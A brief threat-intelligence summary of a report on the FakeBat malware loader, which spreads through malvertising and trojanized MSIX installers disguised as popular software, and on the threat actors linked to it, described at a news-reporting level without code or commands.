August 19, 2024 at 09:15AM
Cybersecurity experts have discovered a surge in malware infections driven by malvertising campaigns distributing a loader called FakeBat. The attacks target users seeking popular business software, utilizing trojanized MSIX installers and executing PowerShell scripts to download secondary payloads. FakeBat is associated with threat actor Eugenfest and is used to distribute various malware families.
From the meeting notes provided, the key takeaways are:
– Cybersecurity researchers have uncovered a surge in malware infections from malvertising campaigns distributing a loader called FakeBat, also known as EugenLoader and PaykLoader, attributed to the threat actor named Eugenfest and tracked under the name NUMOZYLOD by Google’s threat intelligence team.
– The malware utilizes trojanized MSIX installers to execute a PowerShell script and download a secondary payload, propagating through drive-by download techniques.
– FakeBat is notable for disguising MSIX installers as popular software like Brave, KeePass, Notion, Steam, and Zoom, allowing it to execute a script before launching the main application using a configuration called startScript.
– UNC4536 leverages malvertising to distribute these trojanized MSIX installers and acts as a malware distributor, utilizing FakeBat as a delivery vehicle for next-stage payloads for partners, including FIN7.
– The malware gathers system information and creates a persistence mechanism by creating a shortcut in the StartUp folder.
Additionally, it was noted that Mandiant previously detailed the attack lifecycle associated with another malware downloader named EMPTYSPACE, used by a financially motivated threat cluster known as UNC4990 targeting Italian entities for data exfiltration and cryptojacking activities.